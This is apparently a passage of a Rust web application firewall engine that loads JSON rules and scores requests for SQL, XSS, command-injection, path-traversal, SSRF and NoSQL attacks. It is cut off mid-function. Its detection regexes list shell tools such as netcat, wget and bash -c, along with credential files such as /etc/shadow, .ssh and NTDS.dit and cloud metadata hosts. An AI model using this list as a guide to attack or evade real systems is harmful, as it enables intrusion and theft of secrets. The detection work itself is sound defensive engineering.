use parking_lot::RwLock;
use std::collections::HashMap;
use std::sync::Arc;
use std::time::{Duration, Instant};
use base64::engine::general_purpose::STANDARD as BASE64_STANDARD;
use base64::Engine as _;
use once_cell::sync::Lazy;
use percent_encoding::percent_decode_str;
use regex::{Regex, RegexBuilder};
pub const DEFAULT_EVAL_TIMEOUT: Duration = Duration::from_millis(50);
pub const MAX_EVAL_TIMEOUT: Duration = Duration::from_millis(500);
const REGEX_SIZE_LIMIT: usize = 10 * (1 << 20);
const REGEX_DFA_SIZE_LIMIT: usize = 10 * (1 << 20);
const MAX_RECURSION_DEPTH: u32 = 10;
use crate::waf::index::{
build_rule_index, get_candidate_rule_indices, method_to_mask, CandidateCache,
CandidateCacheKey, RuleIndex, REQ_ARGS, REQ_ARG_ENTRIES, REQ_BODY, REQ_JSON,
};
use crate::waf::rule::{MatchCondition, MatchValue, WafRule};
use crate::waf::state::StateStore;
use crate::waf::types::{Action, EvalContext, Request, RiskContribution, Verdict};
use crate::waf::WafError;
use crate::waf::{TraceEvent, TraceSink, TraceState};
#[allow(dead_code)]
static BASE64_PATTERN: Lazy<Regex> =
Lazy::new(|| Regex::new(r"^([A-Za-z0-9+/]{4})*([A-Za-z0-9+/]{2,3}=)?$").expect("base64 regex"));
static SQL_KEYWORDS: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"\b(load_file|into outfile)\b")
.case_insensitive(true)
.build()
.expect("sql keywords regex")
});
static SQL_PHRASES: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(
r"\b(insert\s+into|delete\s+from|drop\s+(table|database|view)|union\s+(all\s+)?select|select\s+\*\s+from|select\s+.*\s+from\s+information_schema)\b",
)
.case_insensitive(true)
.build()
.expect("sql phrases regex")
});
static SQL_OR_AND_EQ: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"(\bor\b|\band\b)\s+\d+=\d+")
.case_insensitive(true)
.build()
.expect("sql or/and regex")
});
static SQL_COMMENT_1: Lazy<Regex> = Lazy::new(|| Regex::new(r"'\s*--").expect("sql comment 1"));
static SQL_COMMENT_2: Lazy<Regex> = Lazy::new(|| Regex::new(r#""\s*--"#).expect("sql comment 2"));
static SQL_SHUTDOWN: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r";\s*shutdown\b")
.case_insensitive(true)
.build()
.expect("sql shutdown")
});
static XSS_SCRIPT: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"<\s*script\b")
.case_insensitive(true)
.build()
.expect("xss script")
});
static XSS_JS_SCHEME: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"javascript:")
.case_insensitive(true)
.build()
.expect("xss js scheme")
});
static XSS_ON_ATTR: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(
r"\b(onload|onclick|onerror|onmouseover|onfocus|onblur|onsubmit|onchange|oninput|onkeydown|onkeyup|onkeypress|onmousedown|onmouseup|onmousemove|onmouseout|onresize|onscroll|onunload)\s*=",
)
.case_insensitive(true)
.build()
.expect("xss on attr")
});
static XSS_COOKIE: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"document\.cookie")
.case_insensitive(true)
.build()
.expect("xss cookie")
});
static XSS_IMG_SRC: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"<\s*img[^>]+src")
.case_insensitive(true)
.build()
.expect("xss img src")
});
static CMD_BACKTICK: Lazy<Regex> =
Lazy::new(|| Regex::new(r"`[^`]+`").expect("cmd backtick regex"));
static CMD_SUBSHELL: Lazy<Regex> =
Lazy::new(|| Regex::new(r"\$\([^)]+\)").expect("cmd subshell regex"));
static CMD_VAR_SUBST: Lazy<Regex> =
Lazy::new(|| Regex::new(r"\$\{[^}]+\}").expect("cmd var subst regex"));
static CMD_IFS: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"\$IFS|\$\{IFS\}|\bIFS\s*=")
.case_insensitive(true)
.build()
.expect("cmd IFS regex")
});
static CMD_CHAIN: Lazy<Regex> = Lazy::new(|| Regex::new(r"[;&|]{1,2}").expect("cmd chain regex"));
static CMD_BRACE: Lazy<Regex> =
Lazy::new(|| Regex::new(r"\{[^}]*,[^}]*\}").expect("cmd brace regex"));
static CMD_DANGEROUS: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(
r"\b(cat\s+/etc/|/etc/passwd|/etc/shadow|wget\s|curl\s|nc\s+-|ncat\s|netcat\s|bash\s+-|sh\s+-c|/bin/sh|/bin/bash|chmod\s+\+|chown\s|rm\s+-rf|mkfifo|mknod|python\s+-c|perl\s+-e|ruby\s+-e|php\s+-r|lua\s+-e|awk\s+|xargs\s)"
)
.case_insensitive(true)
.build()
.expect("cmd dangerous regex")
});
static CMD_NEWLINE_ENCODED: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"%0[aAdD]")
.case_insensitive(true)
.build()
.expect("cmd newline encoded regex")
});
static CMD_NEWLINE_LITERAL: Lazy<Regex> =
Lazy::new(|| Regex::new(r"[\r\n]").expect("cmd newline literal regex"));
static CMD_REDIRECT: Lazy<Regex> =
Lazy::new(|| Regex::new(r"[<>]{1,2}|2>&1|&>").expect("cmd redirect regex"));
static CMD_PATH_TRAVERSAL: Lazy<Regex> =
Lazy::new(|| Regex::new(r"\.{2,}/+").expect("cmd path traversal regex"));
static CMD_NULL_BYTE: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"%00|\\x00|\\0")
.case_insensitive(true)
.build()
.expect("cmd null byte regex")
});
static PATH_TRAV_BASIC: Lazy<Regex> =
Lazy::new(|| Regex::new(r"\.{2,}[/\\]+|\.{2,}$").expect("path trav basic regex"));
static PATH_TRAV_ENCODED: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"%2e%2e[%/\\]|\.\.%2f|\.\.%5c|%2e%2e$")
.case_insensitive(true)
.build()
.expect("path trav encoded regex")
});
static PATH_TRAV_DOUBLE: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"%25(?:2e|2E){2}%25(?:2f|2F|5c|5C)")
.case_insensitive(true)
.build()
.expect("path trav double encoded regex")
});
static PATH_TRAV_UNICODE: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"%c0%ae|%c0%af|%c1%9c|%c0%9v|%c1%1c|%c0%2e|%e0%80%ae|%f0%80%80%ae")
.case_insensitive(true)
.build()
.expect("path trav unicode regex")
});
static PATH_TRAV_BACKSLASH: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"\.\.\\|%5c%2e%2e|%2e%2e%5c")
.case_insensitive(true)
.build()
.expect("path trav backslash regex")
});
static PATH_TRAV_TARGETS_UNIX: Lazy<Regex> = Lazy::new(|| {
Regex::new(r"/etc/(passwd|shadow|group|hosts|sudoers|ssh/|crontab)|/proc/|/dev/|/var/log/|/root/|\.ssh/|\.bash_history|\.env")
.expect("path trav targets unix regex")
});
static PATH_TRAV_TARGETS_WIN: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(
r"boot\.ini|win\.ini|system32|windows\\system|SAM|NTDS\.dit|web\.config|machine\.config",
)
.case_insensitive(true)
.build()
.expect("path trav targets win regex")
});
static PATH_TRAV_NULL: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"%00|\\x00|\\0|\x00")
.case_insensitive(true)
.build()
.expect("path trav null regex")
});
static SSRF_LOCALHOST_V4: Lazy<Regex> = Lazy::new(|| {
Regex::new(r"(?i)(?://|@)127\.(?:\d{1,3}\.){2}\d{1,3}(?:[:/]|$)")
.expect("ssrf localhost v4 regex")
});
static SSRF_LOCALHOST_V6: Lazy<Regex> = Lazy::new(|| {
Regex::new(r"(?i)(?://|@)\[?(?:::1|0:0:0:0:0:0:0:1)\]?(?:[:/]|$)")
.expect("ssrf localhost v6 regex")
});
static SSRF_MAPPED_IPV6: Lazy<Regex> = Lazy::new(|| {
Regex::new(r"(?i)(?://|@)\[?::ffff:(?:\d{1,3}\.){3}\d{1,3}\]?(?:[:/]|$)")
.expect("ssrf mapped ipv6 regex")
});
static SSRF_CLOUD_METADATA: Lazy<Regex> = Lazy::new(|| {
Regex::new(r"(?i)(?://|@)169\.254\.(?:169\.254|170\.2)(?:[:/]|$)")
.expect("ssrf cloud metadata regex")
});
static SSRF_METADATA_HOST: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"(?://|@)(?:metadata\.google\.internal|metadata\.azure\.com|instance-data\.ec2\.internal|169\.254\.169\.254)")
.case_insensitive(true)
.build()
.expect("ssrf metadata host regex")
});
static SSRF_PRIVATE_IP: Lazy<Regex> = Lazy::new(|| {
Regex::new(r"(?i)(?://|@)(?:10\.(?:\d{1,3}\.){2}\d{1,3}|192\.168\.(?:\d{1,3}\.)\d{1,3}|172\.(?:1[6-9]|2\d|3[01])\.(?:\d{1,3}\.)\d{1,3})(?:[:/]|$)")
.expect("ssrf private ip regex")
});
static SSRF_LINK_LOCAL: Lazy<Regex> = Lazy::new(|| {
Regex::new(r"(?i)(?://|@)169\.254\.(?:\d{1,3}\.)\d{1,3}(?:[:/]|$)")
.expect("ssrf link local regex")
});
static SSRF_DANGEROUS_SCHEME: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"(?:^|[^a-z0-9])(?:(?:file|gopher|dict|ldap|ldaps|expect|php|phar|jar|ftp|tftp|ssh2)://|data:)")
.case_insensitive(true)
.build()
.expect("ssrf dangerous scheme regex")
});
static SSRF_ENCODED_IP: Lazy<Regex> = Lazy::new(|| {
Regex::new(r"(?i)(?://|@)(?:0x[0-9a-f]{8}|2130706433|017700000001|\d{8,10})(?:[:/]|$)")
.expect("ssrf encoded ip regex")
});
static NOSQL_MONGO_OPERATORS: Lazy<Regex> = Lazy::new(|| {
Regex::new(r#"(?i)["\']?\$(?:where|ne|gt|lt|gte|lte|in|nin|regex|exists|type|mod|all|size|elemMatch|meta|slice|comment|rand|natural|or|and|not|nor|expr|jsonSchema|text|geoWithin|geoIntersects|near|nearSphere)["\']?\s*:"#)
.expect("nosql mongo operators regex")
});
static NOSQL_WHERE_JS: Lazy<Regex> = Lazy::new(|| {
Regex::new(r#"(?i)["\']?\$where["\']?\s*:\s*["\']?(?:function\s*\(|this\.|sleep\(|db\.|new\s+Date|tojson|printjson)"#)
.expect("nosql where js regex")
});
static NOSQL_AUTH_BYPASS: Lazy<Regex> = Lazy::new(|| {
Regex::new(r#"(?i)(?:password|passwd|pwd|user|username|login|email)["\']?\s*:\s*\{\s*["\']?\$(?:ne|gt|lt|gte|lte|exists)["\']?\s*:"#)
.expect("nosql auth bypass regex")
});
static NOSQL_AGGREGATION: Lazy<Regex> = Lazy::new(|| {
Regex::new(r#"(?i)["\']?\$(?:lookup|unwind|group|project|match|sort|limit|skip|out|merge|addFields|replaceRoot)["\']?\s*:"#)
.expect("nosql aggregation regex")
});
static NOSQL_COUCHDB: Lazy<Regex> = Lazy::new(|| {
Regex::new(r"(?i)(?:_all_docs|_design/|_view/|_changes|_bulk_docs|_find)")
.expect("nosql couchdb regex")
});
static NOSQL_REDIS: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"\b(?:EVAL|EVALSHA|SCRIPT|DEBUG|FLUSHALL|FLUSHDB|CONFIG|SHUTDOWN|SLAVEOF|REPLICAOF|MIGRATE|DUMP|RESTORE|KEYS|SCAN)\b")
.case_insensitive(true)
.build()
.expect("nosql redis regex")
});
static NOSQL_CASSANDRA: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(
r"\b(?:ALLOW\s+FILTERING|USING\s+TTL|USING\s+TIMESTAMP|TOKEN\s*\(|WRITETIME\s*\()\b",
)
.case_insensitive(true)
.build()
.expect("nosql cassandra regex")
});
static JSON_PROTO_POLLUTION: Lazy<Regex> = Lazy::new(|| {
Regex::new(r#"(?i)["\']?(?:__proto__|constructor|prototype)["\']?\s*:"#)
.expect("json proto pollution regex")
});
pub struct CompiledRules {
pub rules: Vec<WafRule>,
pub rule_id_to_index: HashMap<u32, usize>,
pub rule_index: RuleIndex,
pub regex_cache: HashMap<String, Regex>,
pub word_regex_cache: HashMap<String, Regex>,
}
pub struct Engine {
rules: Vec<WafRule>,
rule_id_to_index: HashMap<u32, usize>,
rule_index: RuleIndex,
regex_cache: HashMap<String, Regex>,
word_regex_cache: HashMap<String, Regex>,
store: RwLock<StateStore>,
candidate_cache: RwLock<CandidateCache>,
max_risk: RwLock<f64>,
enable_repeat_multipliers: RwLock<bool>,
}
impl Engine {
pub fn empty() -> Self {
Self {
rules: Vec::new(),
rule_id_to_index: HashMap::new(),
rule_index: RuleIndex::default(),
regex_cache: HashMap::new(),
word_regex_cache: HashMap::new(),
store: RwLock::new(StateStore::default()),
candidate_cache: RwLock::new(CandidateCache::new(2048)),
max_risk: RwLock::new(100.0),
enable_repeat_multipliers: RwLock::new(true),
}
}
pub fn set_max_risk(&self, max_risk: f64) {
*self.max_risk.write() = max_risk;
}
pub fn max_risk(&self) -> f64 {
*self.max_risk.read()
}
pub fn set_repeat_multipliers(&self, enabled: bool) {
*self.enable_repeat_multipliers.write() = enabled;
}
pub fn load_rules(&mut self, json: &[u8]) -> Result<usize, WafError> {
let compiled = self.precompute_rules(json)?;
let count = compiled.rules.len();
self.reload_from_compiled(compiled);
Ok(count)
}
pub fn precompute_rules(&self, json: &[u8]) -> Result<CompiledRules, WafError> {
let rules: Vec<WafRule> =
serde_json::from_slice(json).map_err(|e| WafError::ParseError(e.to_string()))?;
let rule_id_to_index = rules
.iter()
.enumerate()
.map(|(idx, rule)| (rule.id, idx))
.collect();
let rule_index = build_rule_index(&rules);
let mut regex_cache = HashMap::new();
let mut word_regex_cache = HashMap::new();
let mut patterns = Vec::<String>::new();
let mut words = Vec::<String>::new();
for rule in &rules {
for cond in &rule.matches {
collect_regex_patterns(cond, &mut patterns);
collect_word_values(cond, &mut words);
}
}
patterns.sort();
patterns.dedup();
for pattern in patterns {
let compiled = RegexBuilder::new(&pattern)
.multi_line(true)
.size_limit(REGEX_SIZE_LIMIT)
.dfa_size_limit(REGEX_DFA_SIZE_LIMIT)
.build()
.map_err(|e| WafError::RegexError(format!("'{pattern}': {e}")))?;
regex_cache.insert(pattern, compiled);
}
words.sort();
words.dedup();
for word in words {
let pattern = format!(r"(?i)\b{}\b", regex::escape(&word));
let compiled = RegexBuilder::new(&pattern)
.multi_line(true)
.size_limit(REGEX_SIZE_LIMIT)
.dfa_size_limit(REGEX_DFA_SIZE_LIMIT)
.build()
.map_err(|e| WafError::RegexError(format!("word '{word}': {e}")))?;
word_regex_cache.insert(word, compiled);
}
Ok(CompiledRules {
rules,
rule_id_to_index,
rule_index,
regex_cache,
word_regex_cache,
})
}
pub fn reload_from_compiled(&mut self, compiled: CompiledRules) {
self.rules = compiled.rules;
self.rule_id_to_index = compiled.rule_id_to_index;
self.rule_index = compiled.rule_index;
self.regex_cache = compiled.regex_cache;
self.word_regex_cache = compiled.word_regex_cache;
self.candidate_cache.write().clear();
}
pub fn parse_rules(json: &[u8]) -> Result<Vec<WafRule>, WafError> {
serde_json::from_slice(json).map_err(|e| WafError::ParseError(e.to_string()))
}
pub fn reload_rules(&mut self, rules: Vec<WafRule>) -> Result<(), WafError> {
self.rules = rules;
self.rule_id_to_index = self
.rules
.iter()
.enumerate()
.map(|(idx, rule)| (rule.id, idx))
.collect();
self.rule_index = build_rule_index(&self.rules);
self.candidate_cache.write().clear();
self.regex_cache.clear();
self.word_regex_cache.clear();
let mut patterns = Vec::<String>::new();
let mut words = Vec::<String>::new();
for rule in &self.rules {
for cond in &rule.matches {
collect_regex_patterns(cond, &mut patterns);
collect_word_values(cond, &mut words);
}
}
patterns.sort();
patterns.dedup();
for pattern in patterns {
let compiled = RegexBuilder::new(&pattern)
.multi_line(true)
.size_limit(REGEX_SIZE_LIMIT)
.dfa_size_limit(REGEX_DFA_SIZE_LIMIT)
.build()
.map_err(|e| WafError::RegexError(format!("'{pattern}': {e}")))?;
self.regex_cache.insert(pattern, compiled);
}
words.sort();
words.dedup();
for word in words {
let pattern = format!(r"(?i)\b{}\b", regex::escape(&word));
let compiled = RegexBuilder::new(&pattern)
.multi_line(true)
.size_limit(REGEX_SIZE_LIMIT)
.dfa_size_limit(REGEX_DFA_SIZE_LIMIT)
.build()
.map_err(|e| WafError::RegexError(format!("word '{word}': {e}")))?;
self.word_regex_cache.insert(word, compiled);
}
Ok(())
}
pub fn rule_count(&self) -> usize {
self.rules.len()
}
pub fn analyze(&self, req: &Request) -> Verdict {
let ctx = EvalContext::from_request(req);
let mut trace_state = TraceState::disabled();
self.evaluate_with_trace(&ctx, &mut trace_state)
}
pub fn analyze_with_trace(&self, req: &Request, trace: &mut dyn TraceSink) -> Verdict {
let ctx = EvalContext::from_request(req);
let mut trace_state = TraceState::enabled(trace);
let start = Instant::now();
let verdict = self.evaluate_with_trace(&ctx, &mut trace_state);
let detection_time_us = start.elapsed().as_micros() as u64;
if trace_state.is_enabled() {
trace_state.emit(TraceEvent::EvaluationFinished {
verdict: if matches!(verdict.action, Action::Block) {
"block".to_string()
} else {
"allow".to_string()
},
risk_score: verdict.risk_score,
matched_rules: verdict.matched_rules.clone(),
timed_out: verdict.timed_out,
rules_evaluated: verdict.rules_evaluated,
detection_time_us,
});
}
verdict
}
pub fn analyze_with_timeout(&self, req: &Request, timeout: Duration) -> Verdict {
let effective_timeout = timeout.min(MAX_EVAL_TIMEOUT);
let deadline = Instant::now() + effective_timeout;
let ctx = EvalContext::from_request_with_deadline(req, deadline);
let mut trace_state = TraceState::disabled();
self.evaluate_with_trace(&ctx, &mut trace_state)
}
pub fn analyze_safe(&self, req: &Request) -> Verdict {
self.analyze_with_timeout(req, DEFAULT_EVAL_TIMEOUT)
}
fn evaluate_with_trace(&self, ctx: &EvalContext, trace: &mut TraceState) -> Verdict {
let mut matched_rules = Vec::new();
let mut total_risk = 0.0;
let mut should_block = false;
let mut timed_out = false;
let mut rules_evaluated: u32 = 0;
let risk_contributions: Vec<RiskContribution> = Vec::new();
let max_risk = *self.max_risk.read();
let _enable_multipliers = *self.enable_repeat_multipliers.read();
let method_bit = method_to_mask(ctx.method).unwrap_or(0);
let uri = ctx.url;
let available_features = compute_available_features(ctx);
let header_mask = compute_request_header_mask(&self.rule_index, &ctx.headers);
let cache_key = CandidateCacheKey {
method_bit,
available_features,
is_static: ctx.is_static,
header_mask,
};
let cached = self.candidate_cache.write().get(&cache_key, uri);
let candidates: Arc<[usize]> = match cached {
Some(v) => v,
None => {
let computed = get_candidate_rule_indices(
&self.rule_index,
method_bit,
uri,
available_features,
ctx.is_static,
header_mask,
self.rules.len(),
safe_percent_decode,
);
let candidates: Arc<[usize]> = Arc::from(computed);
self.candidate_cache
.write()
.insert(cache_key, uri.to_string(), candidates.clone());
candidates
}
};
if trace.is_enabled() {
trace.emit(TraceEvent::EvaluationStarted {
method: ctx.method.to_string(),
uri: ctx.url.to_string(),
candidate_rules: candidates.len(),
});
}
for &rule_idx in candidates.iter() {
if ctx.is_deadline_exceeded() {
timed_out = true;
break;
}
let rule = &self.rules[rule_idx];
rules_evaluated += 1;
if trace.is_enabled() {
trace.emit(TraceEvent::RuleStart { rule_id: rule.id });
}
let matched = self.eval_rule(rule, ctx, trace);
if trace.is_enabled() {
trace.emit(TraceEvent::RuleEnd {
rule_id: rule.id,
matched,
risk: rule.effective_risk(),
blocking: rule.blocking.unwrap_or(false),
});
}
if matched {
matched_rules.push(rule.id);
total_risk += rule.effective_risk();
if rule.blocking.unwrap_or(false) {
should_block = true;
}
}
}
let risk_score = total_risk.min(max_risk).max(0.0) as u16;
Verdict {
action: if should_block {
Action::Block
} else {
Action::Allow
},
risk_score,
matched_rules,
entity_risk: 0.0,
entity_blocked: false,
block_reason: if should_block {
Some("Rule-based block".to_string())
} else if timed_out {
Some("Evaluation timeout (partial result)".to_string())
} else {
None
},
risk_contributions,
endpoint_template: None,
endpoint_risk: None,
anomaly_score: None,
adjusted_threshold: None,
anomaly_signals: Vec::new(),
timed_out,
rules_evaluated: if timed_out {
Some(rules_evaluated)
} else {
None
},
}
}
fn eval_rule(&self, rule: &WafRule, ctx: &EvalContext, trace: &mut TraceState) -> bool {
for cond in &rule.matches {
if !self.eval_condition(cond, ctx, None, trace, rule.id, 0) {
return false;
}
}
true
}
fn eval_condition(
&self,
condition: &MatchCondition,
ctx: &EvalContext,
value: Option<&str>,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
if depth >= MAX_RECURSION_DEPTH {
return false;
}
let matched = match condition.kind.as_str() {
"boolean" => self.eval_boolean(condition, ctx, value, trace, rule_id, depth),
"method" => self.eval_method(condition, ctx, trace, rule_id, depth),
"uri" => self.eval_uri(condition, ctx, trace, rule_id, depth),
"args" => self.eval_args(condition, ctx, trace, rule_id, depth),
"named_argument" => self.eval_named_argument(condition, ctx, trace, rule_id, depth),
"header" => self.eval_header(condition, ctx, trace, rule_id, depth),
"contains" => eval_contains(condition.match_value.as_ref(), value),
"starts_with" => eval_starts_with(condition.match_value.as_ref(), value),
"equals" => eval_equals(condition.match_value.as_ref(), value),
"regex" => self.eval_regex(condition.match_value.as_ref(), value),
"word" => self.eval_word(condition.match_value.as_ref(), value),
"multiple_contains" => eval_multiple_contains(condition.match_value.as_ref(), value),
"to_lowercase" => match value {
Some(v) => {
let lowered = v.to_lowercase();
condition
.match_value
.as_ref()
.and_then(|m| m.as_cond())
.map(|child| {
self.eval_condition(
child,
ctx,
Some(&lowered),
trace,
rule_id,
depth + 1,
)
})
.unwrap_or(true)
}
None => false,
},
"percent_decode" => match value {
Some(v) => {
let decoded = safe_percent_decode(v);
condition
.match_value
.as_ref()
.and_then(|m| m.as_cond())
.map(|child| {
self.eval_condition(
child,
ctx,
Some(&decoded),
trace,
rule_id,
depth + 1,
)
})
.unwrap_or(false)
}
None => false,
},
"decode_if_base64" => match value {
Some(v) => {
let decoded = decode_if_base64(v);
condition
.match_value
.as_ref()
.and_then(|m| m.as_cond())
.map(|child| {
self.eval_condition(
child,
ctx,
Some(&decoded),
trace,
rule_id,
depth + 1,
)
})
.unwrap_or(false)
}
None => false,
},
"request" => {
let raw = build_raw_request(ctx);
condition
.match_value
.as_ref()
.and_then(|m| m.as_cond())
.map(|child| {
self.eval_condition(child, ctx, Some(&raw), trace, rule_id, depth + 1)
})
.unwrap_or(false)
}
"request_json" => match ctx.json_text.as_deref() {
Some(json_text) => condition
.match_value
.as_ref()
.and_then(|m| m.as_cond())
.map(|child| {
self.eval_condition(child, ctx, Some(json_text), trace, rule_id, depth + 1)
})
.unwrap_or(true),
None => false,
},
"static_content" => condition
.match_value
.as_ref()
.and_then(|m| m.as_bool())
.map(|target| ctx.is_static == target)
.unwrap_or(false),
"compare" => eval_compare(condition, value),
"count_odd" => eval_count_odd(condition.match_value.as_ref(), value),
"sql_analyzer" => self.eval_sql_analyzer(condition, value, ctx, trace, rule_id, depth),
"xss_analyzer" => self.eval_xss_analyzer(condition, value, ctx, trace, rule_id, depth),
"cmd_analyzer" => self.eval_cmd_analyzer(condition, value, ctx, trace, rule_id, depth),
"path_traversal_analyzer" => {
self.eval_path_traversal_analyzer(condition, value, ctx, trace, rule_id, depth)
}
"ssrf_analyzer" => {
self.eval_ssrf_analyzer(condition, value, ctx, trace, rule_id, depth)
}
"nosql_analyzer" => {
self.eval_nosql_analyzer(condition, value, ctx, trace, rule_id, depth)
}
"hashset" => eval_hashset(condition.match_value.as_ref(), value),
"parse_multipart" => self.eval_parse_multipart(condition, ctx, trace, rule_id, depth),
"track_by_ip" => self.eval_track_by_ip(condition, ctx, trace, rule_id, depth),
"extract_argument" => self.eval_extract_argument(condition, ctx, trace, rule_id, depth),
"unique_count" => {
self.eval_unique_count(condition, ctx, value, &[], trace, rule_id, depth)
}
"count" => self.eval_count(condition, ctx, trace, rule_id, depth),
"remember_match" => condition
.match_value
.as_ref()
.and_then(|m| m.as_cond())
.map(|child| self.eval_condition(child, ctx, value, trace, rule_id, depth + 1))
.unwrap_or(false),
_ => false,
};
if trace.is_enabled() {
trace.emit(TraceEvent::ConditionEvaluated {
rule_id,
kind: condition.kind.clone(),
field: condition.field.clone(),
op: condition.op.clone(),
name: condition.name.clone(),
matched,
});
}
matched
}
fn eval_boolean(
&self,
condition: &MatchCondition,
ctx: &EvalContext,
value: Option<&str>,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
let op = condition.op.as_deref().unwrap_or("and");
let Some(match_value) = condition.match_value.as_ref() else {
return true;
};
match op {
"and" => {
if let Some(items) = match_value.as_arr() {
for item in items {
let Some(child) = item.as_cond() else {
continue;
};
if !self.eval_condition(child, ctx, value, trace, rule_id, depth + 1) {
return false;
}
}
true
} else if let Some(child) = match_value.as_cond() {
self.eval_condition(child, ctx, value, trace, rule_id, depth + 1)
} else {
true
}
}
"or" => {
let mut saw_operand = false;
if let Some(items) = match_value.as_arr() {
for item in items {
let Some(child) = item.as_cond() else {
continue;
};
saw_operand = true;
if self.eval_condition(child, ctx, value, trace, rule_id, depth + 1) {
return true;
}
}
!saw_operand
} else if let Some(child) = match_value.as_cond() {
self.eval_condition(child, ctx, value, trace, rule_id, depth + 1)
} else {
true
}
}
"not" => {
if let Some(items) = match_value.as_arr() {
for item in items {
let Some(child) = item.as_cond() else {
continue;
};
if self.eval_condition(child, ctx, value, trace, rule_id, depth + 1) {
return false;
}
}
true
} else if let Some(child) = match_value.as_cond() {
!self.eval_condition(child, ctx, value, trace, rule_id, depth + 1)
} else {
true
}
}
_ => false,
}
}
fn eval_method(
&self,
condition: &MatchCondition,
ctx: &EvalContext,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
let method = ctx.method;
let Some(match_value) = condition.match_value.as_ref() else {
return false;
};
if let Some(s) = match_value.as_str() {
return method.eq_ignore_ascii_case(s);
}
if let Some(arr) = match_value.as_arr() {
for item in arr {
if let Some(s) = item.as_str() {
if method.eq_ignore_ascii_case(s) {
return true;
}
}
}
return false;
}
if let Some(child) = match_value.as_cond() {
return self.eval_condition(child, ctx, Some(method), trace, rule_id, depth + 1);
}
false
}
fn eval_uri(
&self,
condition: &MatchCondition,
ctx: &EvalContext,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
let uri = ctx.url;
let Some(match_value) = condition.match_value.as_ref() else {
return false;
};
if let Some(s) = match_value.as_str() {
return uri.contains(s);
}
if let Some(child) = match_value.as_cond() {
return self.eval_condition(child, ctx, Some(uri), trace, rule_id, depth + 1);
}
false
}
fn eval_args(
&self,
condition: &MatchCondition,
ctx: &EvalContext,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) else {
return false;
};
for candidate in &ctx.args {
if self.eval_condition(child, ctx, Some(candidate), trace, rule_id, depth + 1) {
return true;
}
}
false
}
fn eval_named_argument(
&self,
condition: &MatchCondition,
ctx: &EvalContext,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) else {
return false;
};
let name = condition.name.as_deref().unwrap_or("*");
for entry in &ctx.arg_entries {
if (name == "*" || entry.key == name)
&& self.eval_condition(child, ctx, Some(&entry.value), trace, rule_id, depth + 1)
{
return true;
}
}
false
}
fn eval_header(
&self,
condition: &MatchCondition,
ctx: &EvalContext,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
if let Some(direction) = condition.direction.as_deref() {
if direction != "c2s" {
return false;
}
}
let Some(field) = condition.field.as_deref() else {
return false;
};
let header_value = get_header_value(&ctx.headers, field);
let Some(header_value) = header_value else {
return false;
};
if condition.match_value.is_none() {
return true;
}
let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) else {
return false;
};
self.eval_condition(child, ctx, Some(header_value), trace, rule_id, depth + 1)
}
fn eval_regex(&self, match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
let Some(value) = value else {
return false;
};
let Some(pattern) = match_value.and_then(|m| m.as_str()) else {
return false;
};
let Some(re) = self.regex_cache.get(pattern) else {
return false;
};
re.is_match(value)
}
fn eval_word(&self, match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
let Some(value) = value else {
return false;
};
let Some(word) = match_value.and_then(|m| m.as_str()) else {
return false;
};
if let Some(re) = self.word_regex_cache.get(word) {
return re.is_match(value);
}
let pattern = format!(r"(?i)\b{}\b", regex::escape(word));
let Ok(re) = RegexBuilder::new(&pattern).multi_line(true).build() else {
return false;
};
re.is_match(value)
}
fn eval_sql_analyzer(
&self,
condition: &MatchCondition,
value: Option<&str>,
ctx: &EvalContext,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
let Some(value) = value else {
return false;
};
let score = sql_analyzer_score(value);
match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
Some(child) => self.eval_condition(
child,
ctx,
Some(&score.to_string()),
trace,
rule_id,
depth + 1,
),
None => score > 0,
}
}
fn eval_xss_analyzer(
&self,
condition: &MatchCondition,
value: Option<&str>,
ctx: &EvalContext,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
let Some(value) = value else {
return false;
};
let score = xss_analyzer_score(value);
match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
Some(child) => self.eval_condition(
child,
ctx,
Some(&score.to_string()),
trace,
rule_id,
depth + 1,
),
None => score > 0,
}
}
fn eval_cmd_analyzer(
&self,
condition: &MatchCondition,
value: Option<&str>,
ctx: &EvalContext,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
let Some(value) = value else {
return false;
};
let score = cmd_analyzer_score(value);
match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
Some(child) => self.eval_condition(
child,
ctx,
